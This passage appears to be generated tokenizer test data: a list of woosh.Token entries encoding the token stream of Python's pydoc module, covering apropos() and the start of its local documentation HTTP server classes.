woosh.Token(woosh.OP, '.', 2248, 45, 2248, 46),
woosh.Token(woosh.NAME, 'StringIO', 2248, 46, 2248, 54),
woosh.Token(woosh.OP, '(', 2248, 54, 2248, 55),
woosh.Token(woosh.NAME, 'source', 2248, 55, 2248, 61),
woosh.Token(woosh.OP, ')', 2248, 61, 2248, 62),
woosh.Token(woosh.OP, ')', 2248, 62, 2248, 63),
woosh.Token(woosh.NAME, 'or', 2248, 64, 2248, 66),
woosh.Token(woosh.STRING, "''", 2248, 67, 2248, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 2248, 69, 2249, 0),
woosh.Token(woosh.NAME, 'if', 2249, 20, 2249, 22),
woosh.Token(woosh.NAME, 'hasattr', 2249, 23, 2249, 30),
woosh.Token(woosh.OP, '(', 2249, 30, 2249, 31),
woosh.Token(woosh.NAME, 'loader', 2249, 31, 2249, 37),
woosh.Token(woosh.OP, ',', 2249, 37, 2249, 38),
woosh.Token(woosh.STRING, "'get_filename'", 2249, 39, 2249, 53),
woosh.Token(woosh.OP, ')', 2249, 53, 2249, 54),
woosh.Token(woosh.OP, ':', 2249, 54, 2249, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 2249, 55, 2250, 0),
woosh.Token(woosh.INDENT, ' ', 2250, 0, 2250, 24),
woosh.Token(woosh.NAME, 'path', 2250, 24, 2250, 28),
woosh.Token(woosh.OP, '=', 2250, 29, 2250, 30),
woosh.Token(woosh.NAME, 'loader', 2250, 31, 2250, 37),
woosh.Token(woosh.OP, '.', 2250, 37, 2250, 38),
woosh.Token(woosh.NAME, 'get_filename', 2250, 38, 2250, 50),
woosh.Token(woosh.OP, '(', 2250, 50, 2250, 51),
woosh.Token(woosh.NAME, 'modname', 2250, 51, 2250, 58),
woosh.Token(woosh.OP, ')', 2250, 58, 2250, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 2250, 59, 2251, 0),
woosh.Token(woosh.DEDENT, ' ', 2251, 0, 2251, 20),
woosh.Token(woosh.NAME, 'else', 2251, 20, 2251, 24),
woosh.Token(woosh.OP, ':', 2251, 24, 2251, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2251, 25, 2252, 0),
woosh.Token(woosh.INDENT, ' ', 2252, 0, 2252, 24),
woosh.Token(woosh.NAME, 'path', 2252, 24, 2252, 28),
woosh.Token(woosh.OP, '=', 2252, 29, 2252, 30),
woosh.Token(woosh.NAME, 'None', 2252, 31, 2252, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2252, 35, 2253, 0),
woosh.Token(woosh.DEDENT, ' ', 2253, 0, 2253, 16),
woosh.Token(woosh.DEDENT, '', 2253, 16, 2253, 16),
woosh.Token(woosh.NAME, 'else', 2253, 16, 2253, 20),
woosh.Token(woosh.OP, ':', 2253, 20, 2253, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2253, 21, 2254, 0),
woosh.Token(woosh.INDENT, ' ', 2254, 0, 2254, 20),
woosh.Token(woosh.NAME, 'try', 2254, 20, 2254, 23),
woosh.Token(woosh.OP, ':', 2254, 23, 2254, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2254, 24, 2255, 0),
woosh.Token(woosh.INDENT, ' ', 2255, 0, 2255, 24),
woosh.Token(woosh.NAME, 'module', 2255, 24, 2255, 30),
woosh.Token(woosh.OP, '=', 2255, 31, 2255, 32),
woosh.Token(woosh.NAME, 'importlib', 2255, 33, 2255, 42),
woosh.Token(woosh.OP, '.', 2255, 42, 2255, 43),
woosh.Token(woosh.NAME, '_bootstrap', 2255, 43, 2255, 53),
woosh.Token(woosh.OP, '.', 2255, 53, 2255, 54),
woosh.Token(woosh.NAME, '_load', 2255, 54, 2255, 59),
woosh.Token(woosh.OP, '(', 2255, 59, 2255, 60),
woosh.Token(woosh.NAME, 'spec', 2255, 60, 2255, 64),
woosh.Token(woosh.OP, ')', 2255, 64, 2255, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2255, 65, 2256, 0),
woosh.Token(woosh.DEDENT, ' ', 2256, 0, 2256, 20),
woosh.Token(woosh.NAME, 'except', 2256, 20, 2256, 26),
woosh.Token(woosh.NAME, 'ImportError', 2256, 27, 2256, 38),
woosh.Token(woosh.OP, ':', 2256, 38, 2256, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2256, 39, 2257, 0),
woosh.Token(woosh.INDENT, ' ', 2257, 0, 2257, 24),
woosh.Token(woosh.NAME, 'if', 2257, 24, 2257, 26),
woosh.Token(woosh.NAME, 'onerror', 2257, 27, 2257, 34),
woosh.Token(woosh.OP, ':', 2257, 34, 2257, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2257, 35, 2258, 0),
woosh.Token(woosh.INDENT, ' ', 2258, 0, 2258, 28),
woosh.Token(woosh.NAME, 'onerror', 2258, 28, 2258, 35),
woosh.Token(woosh.OP, '(', 2258, 35, 2258, 36),
woosh.Token(woosh.NAME, 'modname', 2258, 36, 2258, 43),
woosh.Token(woosh.OP, ')', 2258, 43, 2258, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2258, 44, 2259, 0),
woosh.Token(woosh.DEDENT, ' ', 2259, 0, 2259, 24),
woosh.Token(woosh.NAME, 'continue', 2259, 24, 2259, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2259, 32, 2260, 0),
woosh.Token(woosh.DEDENT, ' ', 2260, 0, 2260, 20),
woosh.Token(woosh.NAME, 'desc', 2260, 20, 2260, 24),
woosh.Token(woosh.OP, '=', 2260, 25, 2260, 26),
woosh.Token(woosh.NAME, 'module', 2260, 27, 2260, 33),
woosh.Token(woosh.OP, '.', 2260, 33, 2260, 34),
woosh.Token(woosh.NAME, '__doc__', 2260, 34, 2260, 41),
woosh.Token(woosh.OP, '.', 2260, 41, 2260, 42),
woosh.Token(woosh.NAME, 'splitlines', 2260, 42, 2260, 52),
woosh.Token(woosh.OP, '(', 2260, 52, 2260, 53),
woosh.Token(woosh.OP, ')', 2260, 53, 2260, 54),
woosh.Token(woosh.OP, '[', 2260, 54, 2260, 55),
woosh.Token(woosh.NUMBER, '0', 2260, 55, 2260, 56),
woosh.Token(woosh.OP, ']', 2260, 56, 2260, 57),
woosh.Token(woosh.NAME, 'if', 2260, 58, 2260, 60),
woosh.Token(woosh.NAME, 'module', 2260, 61, 2260, 67),
woosh.Token(woosh.OP, '.', 2260, 67, 2260, 68),
woosh.Token(woosh.NAME, '__doc__', 2260, 68, 2260, 75),
woosh.Token(woosh.NAME, 'else', 2260, 76, 2260, 80),
woosh.Token(woosh.STRING, "''", 2260, 81, 2260, 83),
woosh.Token(woosh.NEWLINE, '\r\n', 2260, 83, 2261, 0),
woosh.Token(woosh.NAME, 'path', 2261, 20, 2261, 24),
woosh.Token(woosh.OP, '=', 2261, 25, 2261, 26),
woosh.Token(woosh.NAME, 'getattr', 2261, 27, 2261, 34),
woosh.Token(woosh.OP, '(', 2261, 34, 2261, 35),
woosh.Token(woosh.NAME, 'module', 2261, 35, 2261, 41),
woosh.Token(woosh.OP, ',', 2261, 41, 2261, 42),
woosh.Token(woosh.STRING, "'__file__'", 2261, 42, 2261, 52),
woosh.Token(woosh.OP, ',', 2261, 52, 2261, 53),
woosh.Token(woosh.NAME, 'None', 2261, 53, 2261, 57),
woosh.Token(woosh.OP, ')', 2261, 57, 2261, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 2261, 58, 2262, 0),
woosh.Token(woosh.DEDENT, ' ', 2262, 0, 2262, 16),
woosh.Token(woosh.NAME, 'name', 2262, 16, 2262, 20),
woosh.Token(woosh.OP, '=', 2262, 21, 2262, 22),
woosh.Token(woosh.NAME, 'modname', 2262, 23, 2262, 30),
woosh.Token(woosh.OP, '+', 2262, 31, 2262, 32),
woosh.Token(woosh.STRING, "' - '", 2262, 33, 2262, 38),
woosh.Token(woosh.OP, '+', 2262, 39, 2262, 40),
woosh.Token(woosh.NAME, 'desc', 2262, 41, 2262, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2262, 45, 2263, 0),
woosh.Token(woosh.NAME, 'if', 2263, 16, 2263, 18),
woosh.Token(woosh.NAME, 'name', 2263, 19, 2263, 23),
woosh.Token(woosh.OP, '.', 2263, 23, 2263, 24),
woosh.Token(woosh.NAME, 'lower', 2263, 24, 2263, 29),
woosh.Token(woosh.OP, '(', 2263, 29, 2263, 30),
woosh.Token(woosh.OP, ')', 2263, 30, 2263, 31),
woosh.Token(woosh.OP, '.', 2263, 31, 2263, 32),
woosh.Token(woosh.NAME, 'find', 2263, 32, 2263, 36),
woosh.Token(woosh.OP, '(', 2263, 36, 2263, 37),
woosh.Token(woosh.NAME, 'key', 2263, 37, 2263, 40),
woosh.Token(woosh.OP, ')', 2263, 40, 2263, 41),
woosh.Token(woosh.OP, '>=', 2263, 42, 2263, 44),
woosh.Token(woosh.NUMBER, '0', 2263, 45, 2263, 46),
woosh.Token(woosh.OP, ':', 2263, 46, 2263, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2263, 47, 2264, 0),
woosh.Token(woosh.INDENT, ' ', 2264, 0, 2264, 20),
woosh.Token(woosh.NAME, 'callback', 2264, 20, 2264, 28),
woosh.Token(woosh.OP, '(', 2264, 28, 2264, 29),
woosh.Token(woosh.NAME, 'path', 2264, 29, 2264, 33),
woosh.Token(woosh.OP, ',', 2264, 33, 2264, 34),
woosh.Token(woosh.NAME, 'modname', 2264, 35, 2264, 42),
woosh.Token(woosh.OP, ',', 2264, 42, 2264, 43),
woosh.Token(woosh.NAME, 'desc', 2264, 44, 2264, 48),
woosh.Token(woosh.OP, ')', 2264, 48, 2264, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2264, 49, 2265, 0),
woosh.Token(woosh.DEDENT, ' ', 2266, 0, 2266, 8),
woosh.Token(woosh.DEDENT, '', 2266, 8, 2266, 8),
woosh.Token(woosh.DEDENT, '', 2266, 8, 2266, 8),
woosh.Token(woosh.NAME, 'if', 2266, 8, 2266, 10),
woosh.Token(woosh.NAME, 'completer', 2266, 11, 2266, 20),
woosh.Token(woosh.OP, ':', 2266, 20, 2266, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2266, 21, 2267, 0),
woosh.Token(woosh.INDENT, ' ', 2267, 0, 2267, 12),
woosh.Token(woosh.NAME, 'completer', 2267, 12, 2267, 21),
woosh.Token(woosh.OP, '(', 2267, 21, 2267, 22),
woosh.Token(woosh.OP, ')', 2267, 22, 2267, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2267, 23, 2268, 0),
woosh.Token(woosh.DEDENT, '', 2269, 0, 2269, 0),
woosh.Token(woosh.DEDENT, '', 2269, 0, 2269, 0),
woosh.Token(woosh.DEDENT, '', 2269, 0, 2269, 0),
woosh.Token(woosh.NAME, 'def', 2269, 0, 2269, 3),
woosh.Token(woosh.NAME, 'apropos', 2269, 4, 2269, 11),
woosh.Token(woosh.OP, '(', 2269, 11, 2269, 12),
woosh.Token(woosh.NAME, 'key', 2269, 12, 2269, 15),
woosh.Token(woosh.OP, ')', 2269, 15, 2269, 16),
woosh.Token(woosh.OP, ':', 2269, 16, 2269, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2269, 17, 2270, 0),
woosh.Token(woosh.INDENT, ' ', 2270, 0, 2270, 4),
woosh.Token(woosh.STRING, '"""Print all the one-line module summaries that contain a substring."""', 2270, 4, 2270, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 2270, 75, 2271, 0),
woosh.Token(woosh.NAME, 'def', 2271, 4, 2271, 7),
woosh.Token(woosh.NAME, 'callback', 2271, 8, 2271, 16),
woosh.Token(woosh.OP, '(', 2271, 16, 2271, 17),
woosh.Token(woosh.NAME, 'path', 2271, 17, 2271, 21),
woosh.Token(woosh.OP, ',', 2271, 21, 2271, 22),
woosh.Token(woosh.NAME, 'modname', 2271, 23, 2271, 30),
woosh.Token(woosh.OP, ',', 2271, 30, 2271, 31),
woosh.Token(woosh.NAME, 'desc', 2271, 32, 2271, 36),
woosh.Token(woosh.OP, ')', 2271, 36, 2271, 37),
woosh.Token(woosh.OP, ':', 2271, 37, 2271, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2271, 38, 2272, 0),
woosh.Token(woosh.INDENT, ' ', 2272, 0, 2272, 8),
woosh.Token(woosh.NAME, 'if', 2272, 8, 2272, 10),
woosh.Token(woosh.NAME, 'modname', 2272, 11, 2272, 18),
woosh.Token(woosh.OP, '[', 2272, 18, 2272, 19),
woosh.Token(woosh.OP, '-', 2272, 19, 2272, 20),
woosh.Token(woosh.NUMBER, '9', 2272, 20, 2272, 21),
woosh.Token(woosh.OP, ':', 2272, 21, 2272, 22),
woosh.Token(woosh.OP, ']', 2272, 22, 2272, 23),
woosh.Token(woosh.OP, '==', 2272, 24, 2272, 26),
woosh.Token(woosh.STRING, "'.__init__'", 2272, 27, 2272, 38),
woosh.Token(woosh.OP, ':', 2272, 38, 2272, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2272, 39, 2273, 0),
woosh.Token(woosh.INDENT, ' ', 2273, 0, 2273, 12),
woosh.Token(woosh.NAME, 'modname', 2273, 12, 2273, 19),
woosh.Token(woosh.OP, '=', 2273, 20, 2273, 21),
woosh.Token(woosh.NAME, 'modname', 2273, 22, 2273, 29),
woosh.Token(woosh.OP, '[', 2273, 29, 2273, 30),
woosh.Token(woosh.OP, ':', 2273, 30, 2273, 31),
woosh.Token(woosh.OP, '-', 2273, 31, 2273, 32),
woosh.Token(woosh.NUMBER, '9', 2273, 32, 2273, 33),
woosh.Token(woosh.OP, ']', 2273, 33, 2273, 34),
woosh.Token(woosh.OP, '+', 2273, 35, 2273, 36),
woosh.Token(woosh.STRING, "' (package)'", 2273, 37, 2273, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2273, 49, 2274, 0),
woosh.Token(woosh.DEDENT, ' ', 2274, 0, 2274, 8),
woosh.Token(woosh.NAME, 'print', 2274, 8, 2274, 13),
woosh.Token(woosh.OP, '(', 2274, 13, 2274, 14),
woosh.Token(woosh.NAME, 'modname', 2274, 14, 2274, 21),
woosh.Token(woosh.OP, ',', 2274, 21, 2274, 22),
woosh.Token(woosh.NAME, 'desc', 2274, 23, 2274, 27),
woosh.Token(woosh.NAME, 'and', 2274, 28, 2274, 31),
woosh.Token(woosh.STRING, "'- '", 2274, 32, 2274, 36),
woosh.Token(woosh.OP, '+', 2274, 37, 2274, 38),
woosh.Token(woosh.NAME, 'desc', 2274, 39, 2274, 43),
woosh.Token(woosh.OP, ')', 2274, 43, 2274, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2274, 44, 2275, 0),
woosh.Token(woosh.DEDENT, ' ', 2275, 0, 2275, 4),
woosh.Token(woosh.NAME, 'def', 2275, 4, 2275, 7),
woosh.Token(woosh.NAME, 'onerror', 2275, 8, 2275, 15),
woosh.Token(woosh.OP, '(', 2275, 15, 2275, 16),
woosh.Token(woosh.NAME, 'modname', 2275, 16, 2275, 23),
woosh.Token(woosh.OP, ')', 2275, 23, 2275, 24),
woosh.Token(woosh.OP, ':', 2275, 24, 2275, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2275, 25, 2276, 0),
woosh.Token(woosh.INDENT, ' ', 2276, 0, 2276, 8),
woosh.Token(woosh.NAME, 'pass', 2276, 8, 2276, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 2276, 12, 2277, 0),
woosh.Token(woosh.DEDENT, ' ', 2277, 0, 2277, 4),
woosh.Token(woosh.NAME, 'with', 2277, 4, 2277, 8),
woosh.Token(woosh.NAME, 'warnings', 2277, 9, 2277, 17),
woosh.Token(woosh.OP, '.', 2277, 17, 2277, 18),
woosh.Token(woosh.NAME, 'catch_warnings', 2277, 18, 2277, 32),
woosh.Token(woosh.OP, '(', 2277, 32, 2277, 33),
woosh.Token(woosh.OP, ')', 2277, 33, 2277, 34),
woosh.Token(woosh.OP, ':', 2277, 34, 2277, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2277, 35, 2278, 0),
woosh.Token(woosh.INDENT, ' ', 2278, 0, 2278, 8),
woosh.Token(woosh.NAME, 'warnings', 2278, 8, 2278, 16),
woosh.Token(woosh.OP, '.', 2278, 16, 2278, 17),
woosh.Token(woosh.NAME, 'filterwarnings', 2278, 17, 2278, 31),
woosh.Token(woosh.OP, '(', 2278, 31, 2278, 32),
woosh.Token(woosh.STRING, "'ignore'", 2278, 32, 2278, 40),
woosh.Token(woosh.OP, ')', 2278, 40, 2278, 41),
woosh.Token(woosh.COMMENT, '# ignore problems during import', 2278, 42, 2278, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 2278, 73, 2279, 0),
woosh.Token(woosh.NAME, 'ModuleScanner', 2279, 8, 2279, 21),
woosh.Token(woosh.OP, '(', 2279, 21, 2279, 22),
woosh.Token(woosh.OP, ')', 2279, 22, 2279, 23),
woosh.Token(woosh.OP, '.', 2279, 23, 2279, 24),
woosh.Token(woosh.NAME, 'run', 2279, 24, 2279, 27),
woosh.Token(woosh.OP, '(', 2279, 27, 2279, 28),
woosh.Token(woosh.NAME, 'callback', 2279, 28, 2279, 36),
woosh.Token(woosh.OP, ',', 2279, 36, 2279, 37),
woosh.Token(woosh.NAME, 'key', 2279, 38, 2279, 41),
woosh.Token(woosh.OP, ',', 2279, 41, 2279, 42),
woosh.Token(woosh.NAME, 'onerror', 2279, 43, 2279, 50),
woosh.Token(woosh.OP, '=', 2279, 50, 2279, 51),
woosh.Token(woosh.NAME, 'onerror', 2279, 51, 2279, 58),
woosh.Token(woosh.OP, ')', 2279, 58, 2279, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 2279, 59, 2280, 0),
woosh.Token(woosh.COMMENT, '# --------------------------------------- enhanced Web browser interface', 2281, 0, 2281, 72),
woosh.Token(woosh.DEDENT, '', 2283, 0, 2283, 0),
woosh.Token(woosh.DEDENT, '', 2283, 0, 2283, 0),
woosh.Token(woosh.NAME, 'def', 2283, 0, 2283, 3),
woosh.Token(woosh.NAME, '_start_server', 2283, 4, 2283, 17),
woosh.Token(woosh.OP, '(', 2283, 17, 2283, 18),
woosh.Token(woosh.NAME, 'urlhandler', 2283, 18, 2283, 28),
woosh.Token(woosh.OP, ',', 2283, 28, 2283, 29),
woosh.Token(woosh.NAME, 'hostname', 2283, 30, 2283, 38),
woosh.Token(woosh.OP, ',', 2283, 38, 2283, 39),
woosh.Token(woosh.NAME, 'port', 2283, 40, 2283, 44),
woosh.Token(woosh.OP, ')', 2283, 44, 2283, 45),
woosh.Token(woosh.OP, ':', 2283, 45, 2283, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2283, 46, 2284, 0),
woosh.Token(woosh.INDENT, ' ', 2284, 0, 2284, 4),
woosh.Token(woosh.STRING, '"""Start an HTTP server thread on a specific port.\r\n\r\n Start an HTML/text server thread, so HTML or text documents can be\r\n browsed dynamically and interactively with a Web browser. Example use:\r\n\r\n >>> import time\r\n >>> import pydoc\r\n\r\n Define a URL handler. To determine what the client is asking\r\n for, check the URL and content_type.\r\n\r\n Then get or generate some text or HTML code and return it.\r\n\r\n >>> def my_url_handler(url, content_type):\r\n ... text = \'the URL sent was: (%s, %s)\' % (url, content_type)\r\n ... return text\r\n\r\n Start server thread on port 0.\r\n If you use port 0, the server will pick a random port number.\r\n You can then use serverthread.port to get the port number.\r\n\r\n >>> port = 0\r\n >>> serverthread = pydoc._start_server(my_url_handler, port)\r\n\r\n Check that the server is really started. If it is, open browser\r\n and get first page. Use serverthread.url as the starting page.\r\n\r\n >>> if serverthread.serving:\r\n ... import webbrowser\r\n\r\n The next two lines are commented out so a browser doesn\'t open if\r\n doctest is run on this module.\r\n\r\n #... webbrowser.open(serverthread.url)\r\n #True\r\n\r\n Let the server do its thing. We just need to monitor its status.\r\n Use time.sleep so the loop doesn\'t hog the CPU.\r\n\r\n >>> starttime = time.monotonic()\r\n >>> timeout = 1 #seconds\r\n\r\n This is a short timeout for testing purposes.\r\n\r\n >>> while serverthread.serving:\r\n ... time.sleep(.01)\r\n ... if serverthread.serving and time.monotonic() - starttime > timeout:\r\n ... serverthread.stop()\r\n ... break\r\n\r\n Print any errors that may have occurred.\r\n\r\n >>> print(serverthread.error)\r\n None\r\n """', 2284, 4, 2338, 6),
woosh.Token(woosh.NEWLINE, '\r\n', 2338, 6, 2339, 0),
woosh.Token(woosh.NAME, 'import', 2339, 4, 2339, 10),
woosh.Token(woosh.NAME, 'http', 2339, 11, 2339, 15),
woosh.Token(woosh.OP, '.', 2339, 15, 2339, 16),
woosh.Token(woosh.NAME, 'server', 2339, 16, 2339, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2339, 22, 2340, 0),
woosh.Token(woosh.NAME, 'import', 2340, 4, 2340, 10),
woosh.Token(woosh.NAME, 'email', 2340, 11, 2340, 16),
woosh.Token(woosh.OP, '.', 2340, 16, 2340, 17),
woosh.Token(woosh.NAME, 'message', 2340, 17, 2340, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2340, 24, 2341, 0),
woosh.Token(woosh.NAME, 'import', 2341, 4, 2341, 10),
woosh.Token(woosh.NAME, 'select', 2341, 11, 2341, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2341, 17, 2342, 0),
woosh.Token(woosh.NAME, 'import', 2342, 4, 2342, 10),
woosh.Token(woosh.NAME, 'threading', 2342, 11, 2342, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 2342, 20, 2343, 0),
woosh.Token(woosh.NAME, 'class', 2344, 4, 2344, 9),
woosh.Token(woosh.NAME, 'DocHandler', 2344, 10, 2344, 20),
woosh.Token(woosh.OP, '(', 2344, 20, 2344, 21),
woosh.Token(woosh.NAME, 'http', 2344, 21, 2344, 25),
woosh.Token(woosh.OP, '.', 2344, 25, 2344, 26),
woosh.Token(woosh.NAME, 'server', 2344, 26, 2344, 32),
woosh.Token(woosh.OP, '.', 2344, 32, 2344, 33),
woosh.Token(woosh.NAME, 'BaseHTTPRequestHandler', 2344, 33, 2344, 55),
woosh.Token(woosh.OP, ')', 2344, 55, 2344, 56),
woosh.Token(woosh.OP, ':', 2344, 56, 2344, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2344, 57, 2345, 0),
woosh.Token(woosh.INDENT, ' ', 2346, 0, 2346, 8),
woosh.Token(woosh.NAME, 'def', 2346, 8, 2346, 11),
woosh.Token(woosh.NAME, 'do_GET', 2346, 12, 2346, 18),
woosh.Token(woosh.OP, '(', 2346, 18, 2346, 19),
woosh.Token(woosh.NAME, 'self', 2346, 19, 2346, 23),
woosh.Token(woosh.OP, ')', 2346, 23, 2346, 24),
woosh.Token(woosh.OP, ':', 2346, 24, 2346, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2346, 25, 2347, 0),
woosh.Token(woosh.INDENT, ' ', 2347, 0, 2347, 12),
woosh.Token(woosh.STRING, '"""Process a request from an HTML browser.\r\n\r\n The URL received is in self.path.\r\n Get an HTML page from self.urlhandler and send it.\r\n """', 2347, 12, 2351, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 2351, 15, 2352, 0),
woosh.Token(woosh.NAME, 'if', 2352, 12, 2352, 14),
woosh.Token(woosh.NAME, 'self', 2352, 15, 2352, 19),
woosh.Token(woosh.OP, '.', 2352, 19, 2352, 20),
woosh.Token(woosh.NAME, 'path', 2352, 20, 2352, 24),
woosh.Token(woosh.OP, '.', 2352, 24, 2352, 25),
woosh.Token(woosh.NAME, 'endswith', 2352, 25, 2352, 33),
woosh.Token(woosh.OP, '(', 2352, 33, 2352, 34),
woosh.Token(woosh.STRING, "'.css'", 2352, 34, 2352, 40),
woosh.Token(woosh.OP, ')', 2352, 40, 2352, 41),
woosh.Token(woosh.OP, ':', 2352, 41, 2352, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2352, 42, 2353, 0),
woosh.Token(woosh.INDENT, ' ', 2353, 0, 2353, 16),
woosh.Token(woosh.NAME, 'content_type', 2353, 16, 2353, 28),
woosh.Token(woosh.OP, '=', 2353, 29, 2353, 30),
woosh.Token(woosh.STRING, "'text/css'", 2353, 31, 2353, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2353, 41, 2354, 0),
woosh.Token(woosh.DEDENT, ' ', 2354, 0, 2354, 12),
woosh.Token(woosh.NAME, 'else', 2354, 12, 2354, 16),
woosh.Token(woosh.OP, ':', 2354, 16, 2354, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2354, 17, 2355, 0),
woosh.Token(woosh.INDENT, ' ', 2355, 0, 2355, 16),
woosh.Token(woosh.NAME, 'content_type', 2355, 16, 2355, 28),
woosh.Token(woosh.OP, '=', 2355, 29, 2355, 30),
woosh.Token(woosh.STRING, "'text/html'", 2355, 31, 2355, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2355, 42, 2356, 0),
woosh.Token(woosh.DEDENT, ' ', 2356, 0, 2356, 12),
woosh.Token(woosh.NAME, 'self', 2356, 12, 2356, 16),
woosh.Token(woosh.OP, '.', 2356, 16, 2356, 17),
woosh.Token(woosh.NAME, 'send_response', 2356, 17, 2356, 30),
woosh.Token(woosh.OP, '(', 2356, 30, 2356, 31),
woosh.Token(woosh.NUMBER, '200', 2356, 31, 2356, 34),
woosh.Token(woosh.OP, ')', 2356, 34, 2356, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2356, 35, 2357, 0),
woosh.Token(woosh.NAME, 'self', 2357, 12, 2357, 16),
woosh.Token(woosh.OP, '.', 2357, 16, 2357, 17),
woosh.Token(woosh.NAME, 'send_header', 2357, 17, 2357, 28),
woosh.Token(woosh.OP, '(', 2357, 28, 2357, 29),
woosh.Token(woosh.STRING, "'Content-Type'", 2357, 29, 2357, 43),
woosh.Token(woosh.OP, ',', 2357, 43, 2357, 44),
woosh.Token(woosh.STRING, "'%s; charset=UTF-8'", 2357, 45, 2357, 64),
woosh.Token(woosh.OP, '%', 2357, 65, 2357, 66),
woosh.Token(woosh.NAME, 'content_type', 2357, 67, 2357, 79),
woosh.Token(woosh.OP, ')', 2357, 79, 2357, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 2357, 80, 2358, 0),
woosh.Token(woosh.NAME, 'self', 2358, 12, 2358, 16),
woosh.Token(woosh.OP, '.', 2358, 16, 2358, 17),
woosh.Token(woosh.NAME, 'end_headers', 2358, 17, 2358, 28),
woosh.Token(woosh.OP, '(', 2358, 28, 2358, 29),
woosh.Token(woosh.OP, ')', 2358, 29, 2358, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2358, 30, 2359, 0),
woosh.Token(woosh.NAME, 'self', 2359, 12, 2359, 16),
woosh.Token(woosh.OP, '.', 2359, 16, 2359, 17),
woosh.Token(woosh.NAME, 'wfile', 2359, 17, 2359, 22),
woosh.Token(woosh.OP, '.', 2359, 22, 2359, 23),
woosh.Token(woosh.NAME, 'write', 2359, 23, 2359, 28),
woosh.Token(woosh.OP, '(', 2359, 28, 2359, 29),
woosh.Token(woosh.NAME, 'self', 2359, 29, 2359, 33),
woosh.Token(woosh.OP, '.', 2359, 33, 2359, 34),
woosh.Token(woosh.NAME, 'urlhandler', 2359, 34, 2359, 44),
woosh.Token(woosh.OP, '(', 2359, 44, 2359, 45),
woosh.Token(woosh.NAME, 'self', 2360, 16, 2360, 20),
woosh.Token(woosh.OP, '.', 2360, 20, 2360, 21),
woosh.Token(woosh.NAME, 'path', 2360, 21, 2360, 25),
woosh.Token(woosh.OP, ',', 2360, 25, 2360, 26),
woosh.Token(woosh.NAME, 'content_type', 2360, 27, 2360, 39),
woosh.Token(woosh.OP, ')', 2360, 39, 2360, 40),
woosh.Token(woosh.OP, '.', 2360, 40, 2360, 41),
woosh.Token(woosh.NAME, 'encode', 2360, 41, 2360, 47),
woosh.Token(woosh.OP, '(', 2360, 47, 2360, 48),
woosh.Token(woosh.STRING, "'utf-8'", 2360, 48, 2360, 55),
woosh.Token(woosh.OP, ')', 2360, 55, 2360, 56),
woosh.Token(woosh.OP, ')', 2360, 56, 2360, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2360, 57, 2361, 0),
woosh.Token(woosh.DEDENT, ' ', 2362, 0, 2362, 8),
woosh.Token(woosh.NAME, 'def', 2362, 8, 2362, 11),
woosh.Token(woosh.NAME, 'log_message', 2362, 12, 2362, 23),
woosh.Token(woosh.OP, '(', 2362, 23, 2362, 24),
woosh.Token(woosh.NAME, 'self', 2362, 24, 2362, 28),
woosh.Token(woosh.OP, ',', 2362, 28, 2362, 29),
woosh.Token(woosh.OP, '*', 2362, 30, 2362, 31),
woosh.Token(woosh.NAME, 'args', 2362, 31, 2362, 35),
woosh.Token(woosh.OP, ')', 2362, 35, 2362, 36),
woosh.Token(woosh.OP, ':', 2362, 36, 2362, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2362, 37, 2363, 0),
woosh.Token(woosh.COMMENT, "# Don't log messages.", 2363, 12, 2363, 33),
woosh.Token(woosh.INDENT, ' ', 2364, 0, 2364, 12),
woosh.Token(woosh.NAME, 'pass', 2364, 12, 2364, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2364, 16, 2365, 0),
woosh.Token(woosh.DEDENT, ' ', 2366, 0, 2366, 4),
woosh.Token(woosh.DEDENT, '', 2366, 4, 2366, 4),
woosh.Token(woosh.NAME, 'class', 2366, 4, 2366, 9),
woosh.Token(woosh.NAME, 'DocServer', 2366, 10, 2366, 19),
woosh.Token(woosh.OP, '(', 2366, 19, 2366, 20),
woosh.Token(woosh.NAME, 'http', 2366, 20, 2366, 24),
woosh.Token(woosh.OP, '.', 2366, 24, 2366, 25),
woosh.Token(woosh.NAME, 'server', 2366, 25, 2366, 31),
woosh.Token(woosh.OP, '.', 2366, 31, 2366, 32),
